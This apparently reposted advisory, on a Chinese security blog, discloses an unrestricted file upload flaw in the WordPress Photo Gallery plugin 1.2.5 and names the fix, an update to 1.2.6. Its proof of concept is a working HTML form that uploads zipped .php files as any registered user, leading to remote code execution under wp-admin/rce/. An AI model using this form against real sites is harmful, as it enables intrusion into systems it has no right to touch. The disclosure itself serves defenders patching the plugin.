worpress Photo Gallery 上传漏洞

  • A+
所属分类:漏洞分享
1. Description
   
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php
 
http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
   
2. Proof of Concept
 
Login as regular user (created using wp-login.php?action=register).
 
Pack .php files into .zip archive then send it using:
 
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>
 
Your files will be visible inside:
 
http://wordpress-install/wp-admin/rce/
   
3. Solution:
   
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip

前提先注册用户~~~~~~~~

参考:

http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: